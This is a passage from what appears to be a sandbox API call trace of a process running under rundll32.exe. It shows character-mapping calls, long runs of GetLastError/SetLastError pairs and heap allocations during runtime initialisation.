lpMultiByteStr=0x14f65c, cbMultiByte=256, lpWideCharStr=0x14efb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0166.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0166.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14eda8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0166.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x14f45c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x836\x86K\x98÷\x14", lpUsedDefaultChar=0x0) returned 256 [0166.942] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x65027c18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0166.942] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.943] SetLastError (dwErrCode=0x0) [0166.943] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.944] SetLastError (dwErrCode=0x0) [0166.944] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.945] GetLastError () returned 0x0 [0166.945] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.946] SetLastError (dwErrCode=0x0) [0166.946] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.947] SetLastError (dwErrCode=0x0) [0166.947] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.948] SetLastError (dwErrCode=0x0) [0166.948] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.949] SetLastError (dwErrCode=0x0) [0166.949] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.950] SetLastError (dwErrCode=0x0) [0166.950] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7d) returned 0x634dc8 [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.951] SetLastError (dwErrCode=0x0) [0166.951] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.952] GetLastError () returned 0x0 [0166.952] SetLastError (dwErrCode=0x0) [0166.953] GetLastError () returned 0x0 [0166.953] SetLastError (dwErrCode=0x0) [0166.953] GetLastError () returned 0x0 [0166.953] SetLastError (dwErrCode=0x0) [0166.953] GetLastError () returned 0x0 [0166.953] SetLastError (dwErrCode=0x0) [0166.953] GetLastError () returned 0x0 [0166.953] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.957] GetLastError () returned 0x0 [0166.957] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.958] GetLastError () returned 0x0 [0166.958] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.959] GetLastError () returned 0x0 [0166.959] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.960] SetLastError (dwErrCode=0x0) [0166.960] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.961] GetLastError () returned 0x0 [0166.961] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] GetLastError () returned 0x0 [0166.962] SetLastError (dwErrCode=0x0) [0166.962] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9c) returned 0x648098 [0166.962] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1f) returned 0x62fb78 [0166.962] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2b) returned 0x632fe8 [0166.962] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x37) returned 0x64b408 [0166.962] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x64c4d8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x31) returned 0x64b3c8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x625ca8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x6520c8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x625cc8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd) returned 0x64a868 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1a) returned 0x62fd30 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x632f78 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x19) returned 0x62fb50 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x625d08 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x64a7d8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xfd) returned 0x66fee8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3e) returned 0x64c490 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x62fc18 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1d) returned 0x62fa88 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x48) returned 0x6500c0 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625ce8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x625d28 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1b) returned 0x62fbc8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x651e28 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x632fb0 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1e) returned 0x62fb00 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6b) returned 0x62ccd8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x17) returned 0x625d48 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x625d68 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xf) returned 0x643048 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x625d88 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2a) returned 0x632e98 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x29) returned 0x632d10 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x625da8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x13) returned 0x625dc8 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1f) returned 0x62fa10 [0166.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625de8 [0166.964] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, 